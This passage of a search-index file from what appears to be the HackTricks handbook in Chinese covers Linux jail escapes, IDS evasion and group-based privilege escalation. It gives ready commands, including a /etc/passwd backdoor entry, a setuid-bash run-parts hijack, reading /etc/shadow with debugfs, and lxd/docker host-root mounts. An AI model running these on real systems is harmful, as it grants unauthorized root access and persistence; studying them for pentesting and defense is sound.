之外","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root(?) + Fork","id":"1769","title":"Root(?) 
+ Fork"},"177":{"body":"传感器通常出于性能原因不计算校验和。因此,攻击者可以发送一个数据包,该数据包将被 传感器解释但被最终主机拒绝。 示例: 发送一个带有 RST 标志和无效校验和的数据包,因此,IPS/IDS 可能认为该数据包将关闭连接,但最终主机将丢弃该数据包,因为校验和无效。","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 无效 校验和","id":"177","title":"无效 校验和"},"1770":{"body":"warning 以前用户可以从自己的进程调试自己的进程……但这在默认情况下不再可能 无论如何,如果可能的话,你可以 ptrace 进入一个进程并在其中执行 shellcode ( 见此示例 )。","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » ptrace","id":"1770","title":"ptrace"},"1771":{"body":"","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Bash Jails","id":"1771","title":"Bash Jails"},"1772":{"body":"获取关于监禁的信息: bash echo $SHELL\\necho $PATH\\nenv\\nexport\\npwd","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Enumeration","id":"1772","title":"Enumeration"},"1773":{"body":"检查您是否可以修改 PATH 环境变量 bash echo $PATH #See the path of the executables that you can use\\nPATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path\\necho /home/* #List directory","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 修改 PATH","id":"1773","title":"修改 PATH"},"1774":{"body":"bash :set shell=/bin/sh\\n:shell","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 使用 vim","id":"1774","title":"使用 vim"},"1775":{"body":"检查您是否可以创建一个以 /bin/bash 为内容的可执行文件 bash red /bin/bash\\n> w wx/path #Write /bin/bash in a writable and executable path","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 创建脚本","id":"1775","title":"创建脚本"},"1776":{"body":"如果您通过ssh访问,可以使用这个技巧来执行bash shell: bash ssh -t user@ bash # Get directly an interactive shell\\nssh user@ -t \\"bash --noprofile -i\\"\\nssh user@ -t \\"() { :; }; sh -i \\"","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 从SSH获取bash","id":"1776","title":"从SSH获取bash"},"1777":{"body":"bash declare -n PATH; export PATH=/bin;bash -i BASH_CMDS[shell]=/bin/bash;shell -i","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 
声明","id":"1777","title":"声明"},"1778":{"body":"您可以覆盖例如 sudoers 文件 bash wget http://127.0.0.1:8080/sudoers -O /etc/sudoers","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Wget","id":"1778","title":"Wget"},"1779":{"body":"https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/ https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells https://gtfobins.github.io 这页也可能很有趣: Bypass Linux Restrictions","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 其他技巧","id":"1779","title":"其他技巧"},"178":{"body":"传感器可能会忽略某些标志和选项设置在 IP 和 TCP 头中的数据包,而目标主机在接收时接受该数据包。","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 不常见的 IP 和 TCP 选项","id":"178","title":"不常见的 IP 和 TCP 选项"},"1780":{"body":"关于从 python 监狱中逃脱的技巧在以下页面: Bypass Python sandboxes","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Python 监狱","id":"1780","title":"Python 监狱"},"1781":{"body":"在此页面中,您可以找到您在 lua 中可以访问的全局函数: https://www.gammon.com.au/scripts/doc.php?general=lua_base 带命令执行的 Eval: bash load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))() 一些 不使用点来调用库函数 的技巧: bash print(string.char(0x41, 0x42))\\nprint(rawget(string, \\"char\\")(0x41, 0x42)) 列举库的函数: bash for k,v in pairs(string) do print(k,v) end 请注意,每次在 不同的lua环境中执行前面的单行代码时,函数的顺序会改变 。因此,如果您需要执行一个特定的函数,可以通过加载不同的 lua 环境并调用该库的第一个函数来进行暴力攻击: bash #In this scenario you could BF the victim that is generating a new lua environment\\n#for every interaction with the following line and when you are lucky\\n#the char function is going to be executed\\nfor k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end #This attack from a CTF can be used to try to chain the function execute from \\"os\\" library\\n#and \\"char\\" from string library, and the use both to execute a command\\nfor i in seq 1000; do echo \\"for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) 
print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end\\" | nc 10.10.10.10 10006 | grep -A5 \\"Code: char\\"; done 获取交互式 lua shell : 如果你在一个受限的 lua shell 中,可以通过调用来获取一个新的 lua shell(希望是无限的): bash debug.debug()","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Lua 监狱","id":"1781","title":"Lua 监狱"},"1782":{"body":"https://www.youtube.com/watch?v=UO618TeyCWo (幻灯片: https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf ) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 参考","id":"1782","title":"参考"},"1783":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » euid, ruid, suid","id":"1783","title":"euid, ruid, suid"},"1784":{"body":"ruid : 真实用户 ID 表示发起进程的用户。 euid : 被称为 有效用户 ID ,它代表系统用来确定进程权限的用户身份。通常情况下,euid 与 ruid 相同,除非在执行 SetUID 二进制文件的情况下,euid 采用文件所有者的身份,从而授予特定的操作权限。 suid : 这个 保存的用户 ID 在高权限进程(通常以 root 身份运行)需要暂时放弃其权限以执行某些任务时至关重要,之后再恢复其最初的提升状态。 重要说明 非 root 进程只能将其 euid 修改为当前的 ruid、euid 或 suid。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » 用户标识变量","id":"1784","title":"用户标识变量"},"1785":{"body":"setuid : 与最初的假设相反,setuid 主要修改 euid 而不是 ruid。具体而言,对于特权进程,它将 ruid、euid 和 suid 与指定用户(通常是 root)对齐,有效地巩固这些 ID,因为 suid 的覆盖。详细信息可以在 setuid man page 中找到。 setreuid 和 setresuid : 这些函数允许对 ruid、euid 和 suid 进行细致的调整。然而,它们的能力取决于进程的权限级别。对于非 root 进程,修改仅限于当前的 ruid、euid 和 suid 值。相比之下,root 进程或具有 CAP_SETUID 能力的进程可以为这些 ID 分配任意值。更多信息可以从 setresuid man page 和 setreuid man page 中获取。 这些功能并不是作为安全机制设计的,而是为了促进预期的操作流程,例如当程序通过更改其有效用户 ID 来采用另一个用户的身份时。 值得注意的是,虽然 setuid 可能是提升到 root 权限的常用方法(因为它将所有 ID 对齐到 root),但区分这些函数对于理解和操控不同场景下的用户 ID 行为至关重要。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » 理解 set*uid 函数","id":"1785","title":"理解 set*uid 函数"},"1786":{"body":"execve 系统调用 功能 : execve 启动一个程序,由第一个参数决定。它接受两个数组参数,argv 用于参数,envp 用于环境。 行为 : 它保留调用者的内存空间,但刷新堆栈、堆和数据段。程序的代码被新程序替换。 用户 ID 保持 : ruid、euid 和附加的组 ID 保持不变。 如果新程序设置了 SetUID 位,euid 可能会有细微变化。 suid 在执行后从 euid 更新。 文档 : 详细信息可以在 execve man page 中找到。 system 函数 功能 : 与 execve 不同,system 使用 fork 创建一个子进程,并在该子进程中执行命令,使用 execl。 命令执行 : 通过 sh 执行命令,使用 execl(\\"/bin/sh\\", \\"sh\\", \\"-c\\", command, (char *) NULL);。 行为 : 由于 execl 是 execve 的一种形式,它在新子进程的上下文中以类似方式操作。 文档 : 进一步的见解可以从 system man page 中获取。 带有 SUID 的 bash 和 sh 的行为 bash : 有一个 -p 选项影响 euid 和 ruid 的处理方式。 如果没有 -p,bash 会将 euid 设置为 ruid,如果它们最初不同。 如果有 -p,则保留初始的 euid。 更多细节可以在 bash man page 中找到。 sh : 没有类似于 bash 中的 -p 的机制。 关于用户 ID 的行为没有明确提及,除了在 -i 选项下,强调保留 euid 和 ruid 的相等性。 额外信息可在 sh man page 中找到。 这些机制在操作上各不相同,为执行和程序之间的转换提供了多种选择,具体细节在用户 ID 
的管理和保留方面有所不同。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » Linux 中的程序执行机制","id":"1786","title":"Linux 中的程序执行机制"},"1787":{"body":"示例取自 https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail,查看以获取更多信息 案例 1: 使用 setuid 和 system 目标 : 理解 setuid 与 system 和 bash 作为 sh 结合的效果。 C 代码 : c #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nsetuid(1000);\\nsystem(\\"id\\");\\nreturn 0;\\n} 编译和权限: bash oxdf@hacky$ gcc a.c -o /mnt/nfsshare/a;\\noxdf@hacky$ chmod 4755 /mnt/nfsshare/a bash bash-4.2$ $ ./a\\nuid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 分析: ruid 和 euid 初始值分别为 99(nobody)和 1000(frank)。 setuid 将两者对齐到 1000。 system 执行 /bin/bash -c id,这是由于 sh 到 bash 的符号链接。 bash 在没有 -p 的情况下,将 euid 调整为与 ruid 匹配,导致两者均为 99(nobody)。 案例 2:使用 setreuid 和 system C 代码 : c #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nsetreuid(1000, 1000);\\nsystem(\\"id\\");\\nreturn 0;\\n} 编译和权限: bash oxdf@hacky$ gcc b.c -o /mnt/nfsshare/b; chmod 4755 /mnt/nfsshare/b 执行和结果: bash bash-4.2$ $ ./b\\nuid=1000(frank) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 分析: setreuid 将 ruid 和 euid 都设置为 1000。 system 调用 bash,由于用户 ID 的相等性,保持用户 ID,有效地作为 frank 操作。 案例 3:使用 setuid 和 execve 目标:探索 setuid 和 execve 之间的交互。 bash #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nsetuid(1000);\\nexecve(\\"/usr/bin/id\\", NULL, NULL);\\nreturn 0;\\n} 执行和结果: bash bash-4.2$ $ ./c\\nuid=99(nobody) gid=99(nobody) euid=1000(frank) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 分析: ruid 保持为 99,但 euid 设置为 1000,符合 setuid 的效果。 C 代码示例 2(调用 Bash): bash #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nsetuid(1000);\\nexecve(\\"/bin/bash\\", NULL, NULL);\\nreturn 0;\\n} 执行和结果: bash bash-4.2$ $ ./d\\nbash-4.2$ $ id\\nuid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 分析: 尽管 euid 通过 setuid 设置为 1000,bash 由于缺少 -p 将 euid 
重置为 ruid (99)。 C 代码示例 3 (使用 bash -p): bash #define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nchar *const paramList[10] = {\\"/bin/bash\\", \\"-p\\", NULL};\\nsetuid(1000);\\nexecve(paramList[0], paramList, NULL);\\nreturn 0;\\n} 执行和结果: bash bash-4.2$ $ ./e\\nbash-4.2$ $ id\\nuid=99(nobody) gid=99(nobody) euid=100","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » 测试执行中的用户 ID 行为","id":"1787","title":"测试执行中的用户 ID 行为"},"1788":{"body":"https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » euid, ruid, suid » 参考","id":"1788","title":"参考"},"1789":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » 有趣的组 - Linux 权限提升","id":"1789","title":"有趣的组 - Linux 权限提升"},"179":{"body":"当你分片一个数据包时,可能会存在某种重叠(也许数据包 2 的前 8 字节与数据包 1 的最后 8 字节重叠,数据包 2 的最后 8 字节与数据包 3 的前 8 字节重叠)。然后,如果 IDS/IPS 以不同于最终主机的方式重组它们,将会解释为不同的数据包。 或者,也许,两个具有相同偏移量的数据包到达,主机必须决定选择哪个。 BSD : 优先选择偏移量较小的数据包。对于具有相同偏移量的数据包,将选择第一个。 Linux : 像 BSD,但它更喜欢具有相同偏移量的最后一个数据包。 First (Windows): 第一个到达的值,保持该值。 Last (cisco): 最后到达的值,保持该值。","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 重叠","id":"179","title":"重叠"},"1790":{"body":"","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Sudo/管理员组","id":"1790","title":"Sudo/管理员组"},"1791":{"body":"有时 ,**默认情况下(或因为某些软件需要它)**在 /etc/sudoers 文件中可以找到一些这样的行: bash # Allow members of group sudo to execute any command\\n%sudo\\tALL=(ALL:ALL) ALL # Allow members of group admin to execute any command\\n%admin ALL=(ALL:ALL) ALL 这意味着 任何属于sudo或admin组的用户都可以以sudo身份执行任何操作 。 如果是这种情况,要 成为root,你只需执行 : sudo su","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » PE - 方法 1","id":"1791","title":"PE - 方法 1"},"1792":{"body":"查找所有 suid 二进制文件,并检查是否存在二进制文件 Pkexec : bash find / -perm -4000 2>/dev/null 如果你发现二进制文件 pkexec 是一个 SUID 二进制文件 ,并且你属于 sudo 或 admin ,你可能可以使用 pkexec 以 sudo 身份执行二进制文件。 这是因为通常这些是 polkit 策略 中的组。该策略基本上确定了哪些组可以使用 pkexec。使用以下命令检查: bash cat /etc/polkit-1/localauthority.conf.d/* 在这里你会发现哪些组被允许执行 pkexec ,并且在某些 Linux 发行版中, sudo 和 admin 组默认出现。 要 成为 root,你可以执行 : bash pkexec \\"/bin/sh\\" #You will be prompted for your user password 如果您尝试执行 pkexec 并且收到此 错误 : bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie\\n==== AUTHENTICATION FAILED ===\\nError executing command as another user: Not authorized 这不是因为你没有权限,而是因为你没有通过 GUI 连接 。对此问题有一个解决方法在这里: https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903 。你需要 2 个不同的 
ssh 会话 : session1 echo $$ #Step1: Get current PID\\npkexec \\"/bin/bash\\" #Step 3, execute pkexec\\n#Step 5, if correctly authenticate, you will have a root session session2 pkttyagent --process #Step 2, attach pkttyagent to session1\\n#Step 4, you will be asked in this session to authenticate to pkexec","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » PE - Method 2","id":"1792","title":"PE - Method 2"},"1793":{"body":"有时 , 默认情况下 在 /etc/sudoers 文件中可以找到这一行: %wheel\\tALL=(ALL:ALL) ALL 这意味着 任何属于 wheel 组的用户都可以以 sudo 身份执行任何操作 。 如果是这样,要 成为 root,你只需执行 : sudo su","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Wheel Group","id":"1793","title":"Wheel Group"},"1794":{"body":"来自 group shadow 的用户可以 read /etc/shadow 文件: -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow So, read the file and try to crack some hashes .","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Shadow Group","id":"1794","title":"Shadow Group"},"1795":{"body":"staff : 允许用户在不需要根权限的情况下对系统(/usr/local)进行本地修改(请注意,/usr/local/bin 中的可执行文件在任何用户的 PATH 变量中,并且它们可能会“覆盖” /bin 和 /usr/bin 中同名的可执行文件)。与更相关于监控/安全的 \\"adm\\" 组进行比较。 [source] 在 debian 发行版中,$PATH 变量显示 /usr/local/ 将以最高优先级运行,无论您是否是特权用户。 bash $ echo $PATH\\n/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games # echo $PATH\\n/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 如果我们可以劫持 /usr/local 中的一些程序,我们就可以轻松获得 root 权限。 劫持 run-parts 程序是一种轻松获得 root 权限的方法,因为大多数程序会像 (crontab, 当 ssh 登录时) 一样运行 run-parts。 bash $ cat /etc/crontab | grep run-parts\\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\\n25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }\\n47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }\\n52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; } 或当新的ssh会话登录时。 bash $ 
pspy64\\n2024/02/01 22:02:08 CMD: UID=0 PID=1 | init [2]\\n2024/02/01 22:02:10 CMD: UID=0 PID=17883 | sshd: [accepted]\\n2024/02/01 22:02:10 CMD: UID=0 PID=17884 | sshd: [accepted]\\n2024/02/01 22:02:14 CMD: UID=0 PID=17886 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new\\n2024/02/01 22:02:14 CMD: UID=0 PID=17887 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new\\n2024/02/01 22:02:14 CMD: UID=0 PID=17888 | run-parts --lsbsysinit /etc/update-motd.d\\n2024/02/01 22:02:14 CMD: UID=0 PID=17889 | uname -rnsom\\n2024/02/01 22:02:14 CMD: UID=0 PID=17890 | sshd: mane [priv]\\n2024/02/01 22:02:15 CMD: UID=0 PID=17891 | -bash 利用 bash # 0x1 Add a run-parts script in /usr/local/bin/\\n$ vi /usr/local/bin/run-parts\\n#! /bin/bash\\nchmod 4777 /bin/bash # 0x2 Don\'t forget to add a execute permission\\n$ chmod +x /usr/local/bin/run-parts # 0x3 start a new ssh sesstion to trigger the run-parts program # 0x4 check premission for `u+s`\\n$ ls -la /bin/bash\\n-rwsrwxrwx 1 root root 1099016 May 15 2017 /bin/bash # 0x5 root it\\n$ /bin/bash -p","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Staff Group","id":"1795","title":"Staff Group"},"1796":{"body":"此权限几乎 等同于根访问 ,因为您可以访问机器内部的所有数据。 文件:/dev/sd[a-z][1-9] bash df -h #Find where \\"/\\" is mounted\\ndebugfs /dev/sda1\\ndebugfs: cd /root\\ndebugfs: ls\\ndebugfs: cat /root/.ssh/id_rsa\\ndebugfs: cat /etc/shadow 请注意,使用 debugfs 您也可以 写入文件 。例如,要将 /tmp/asd1.txt 复制到 /tmp/asd2.txt,您可以执行: bash debugfs -w /dev/sda1\\ndebugfs: dump /tmp/asd1.txt /tmp/asd2.txt 然而,如果你尝试 写入由 root 拥有的文件 (如 /etc/shadow 或 /etc/passwd),你将会遇到“ 权限被拒绝 ”的错误。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » 磁盘组","id":"1796","title":"磁盘组"},"1797":{"body":"使用命令 w 你可以找到 谁登录了系统 ,它将显示如下输出: bash USER TTY 
FROM LOGIN@ IDLE JCPU PCPU WHAT\\nyossi tty1 22:16 5:13m 0.05s 0.04s -bash\\nmoshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash tty1 表示用户 yossi 物理登录 到机器上的一个终端。 video group 有权限查看屏幕输出。基本上,你可以观察屏幕。为了做到这一点,你需要 抓取当前屏幕上的图像 的原始数据,并获取屏幕使用的分辨率。屏幕数据可以保存在 /dev/fb0,你可以在 /sys/class/graphics/fb0/virtual_size 找到该屏幕的分辨率。 bash cat /dev/fb0 > /tmp/screen.raw\\ncat /sys/class/graphics/fb0/virtual_size 要 打开 原始图像 ,您可以使用 GIMP ,选择**screen.raw 文件,并选择文件类型为 原始图像数据**: 然后将宽度和高度修改为屏幕上使用的值,并检查不同的图像类型(并选择显示屏幕效果更好的那个):","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Video Group","id":"1797","title":"Video Group"},"1798":{"body":"看起来默认情况下 root组的成员 可以访问 修改 某些 服务 配置文件或某些 库 文件或 其他有趣的东西 ,这些都可以用来提升权限... 检查root成员可以修改哪些文件 : bash find / -group root -perm -g=w 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Root Group","id":"1798","title":"Root Group"},"1799":{"body":"您可以 将主机的根文件系统挂载到实例的卷 ,因此当实例启动时,它会立即加载一个 chroot 到该卷。这实际上使您在机器上获得了 root 权限。 bash docker image #Get images from the docker service #Get a shell inside a docker container with access as root to the filesystem\\ndocker run -it --rm -v /:/mnt chroot /mnt bash\\n#If you want full access from the host, create a backdoor in the passwd file\\necho \'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh\' >> /etc/passwd #Ifyou just want filesystem and network access you can startthe following container:\\ndocker run --rm -it --pid=host --net=host --privileged -v /:/mnt chroot /mnt bashbash 最后,如果你不喜欢之前的任何建议,或者由于某种原因它们不起作用(docker api 防火墙?),你可以尝试 运行一个特权容器并从中逃逸 ,如这里所述: Docker Security 如果你对 docker socket 有写权限,请阅读 这篇关于如何通过滥用 docker socket 提升权限的文章 . 
GitHub - KrustyHack/docker-privilege-escalation: A docker example for privilege escalation Privilege escalation via Docker - Chris Foster","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Docker 组","id":"1799","title":"Docker 组"},"18":{"body":"tip 这些是 HackTricks 项目的价值观 : 为 所有 互联网用户提供 免费 的 教育黑客 资源。 黑客是关于学习的,而学习应该尽可能免费。 本书的目的是作为一个全面的 教育资源 。 存储 社区发布的精彩 黑客 技术,并给予 原作者 所有的 荣誉 。 我们不想要其他人的荣誉 ,我们只想为大家存储酷炫的技巧。 我们还在 HackTricks 中撰写 我们自己的研究 。 在某些情况下,我们将仅在 HackTricks 中写出技术的重要部分的 摘要 ,并 鼓励读者访问原始帖子 以获取更多细节。 组织 书中的所有黑客技术,使其 更易获取 。 HackTricks 团队投入了数千小时的时间, 仅仅是为了组织内容 ,以便人们可以 更快学习 。","breadcrumbs":"HackTricks Values & FAQ » HackTricks 值观","id":"18","title":"HackTricks 值观"},"180":{"body":"https://github.com/vecna/sniffjoke tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 工具","id":"180","title":"工具"},"1800":{"body":"Interesting Groups - Linux Privesc","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxc/lxd 组","id":"1800","title":"lxc/lxd 组"},"1801":{"body":"通常, adm 组的 成员 有权限 读取 位于 /var/log/ 中的日志文件。 因此,如果你已经攻陷了该组中的用户,你应该确实 查看日志 。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Adm 组","id":"1801","title":"Adm 组"},"1802":{"body":"在 OpenBSD 中, auth 组通常可以在 /etc/skey 和 /var/db/yubikey 文件夹中写入(如果它们被使用)。 这些权限可能会被以下漏洞利用,以 提升权限 到 root: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Auth 组","id":"1802","title":"Auth 组"},"1803":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果您属于 lxd 或 lxc 组 ,您可以成为 root","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxd/lxc Group - Privilege escalation » lxd/lxc 组 - 权限提升","id":"1803","title":"lxd/lxc 组 - 权限提升"},"1804":{"body":"","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxd/lxc Group - Privilege escalation » 无需互联网的利用","id":"1804","title":"无需互联网的利用"},"1805":{"body":"您可以从受信任的存储库下载一个 alpine 镜像以供 lxd 使用。Canonical 在他们的网站上发布每日构建: https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/ 只需从最新构建中获取 lxd.tar.xz 和 rootfs.squashfs 。(目录名称是日期)。 或者,您可以在您的机器上安装这个发行版构建工具: https://github.com/lxc/distrobuilder (按照 GitHub 的说明进行操作): bash # Install requirements\\nsudo apt update\\nsudo apt install -y golang-go gcc debootstrap rsync gpg squashfs-tools git make build-essential libwin-hivex-perl wimtools genisoimage # Clone repo\\nmkdir -p $HOME/go/src/github.com/lxc/\\ncd $HOME/go/src/github.com/lxc/\\ngit clone https://github.com/lxc/distrobuilder # Make distrobuilder\\ncd ./distrobuilder\\nmake # Prepare the creation of alpine\\nmkdir -p $HOME/ContainerImages/alpine/\\ncd $HOME/ContainerImages/alpine/\\nwget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml # Create the container - Beware of architecture while compiling locally.\\nsudo $HOME/go/bin/distrobuilder build-incus alpine.yaml -o 
image.release=3.18 -o image.architecture=x86_64 上传文件 incus.tar.xz (如果从 Canonical 仓库下载,则为 lxd.tar.xz )和 rootfs.squashfs ,将镜像添加到仓库并创建一个容器: bash lxc image import lxd.tar.xz rootfs.squashfs --alias alpine # Check the image is there\\nlxc image list # Create the container\\nlxc init alpine privesc -c security.privileged=true # List containers\\nlxc list lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true caution 如果您发现此错误 错误:未找到存储池。请创建一个新的存储池 运行 lxd init 并将所有选项设置为默认值。然后 重复 之前的命令块 最后,您可以执行容器并获取 root: bash lxc start privesc\\nlxc exec privesc /bin/sh\\n[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxd/lxc Group - Privilege escalation » 方法 1","id":"1805","title":"方法 1"},"1806":{"body":"构建一个 Alpine 镜像并使用标志 security.privileged=true 启动它,强制容器以 root 身份与主机文件系统交互。 bash # build a simple alpine image\\ngit clone https://github.com/saghul/lxd-alpine-builder\\ncd lxd-alpine-builder\\nsed -i \'s,yaml_path=\\"latest-stable/releases/$apk_arch/latest-releases.yaml\\",yaml_path=\\"v3.8/releases/$apk_arch/latest-releases.yaml\\",\' build-alpine\\nsudo ./build-alpine -a i686 # import the image\\nlxc image import ./alpine*.tar.gz --alias myimage # It\'s important doing this from YOUR HOME directory on the victim machine, or it might fail. # before running the image, start and configure the lxd storage pool as 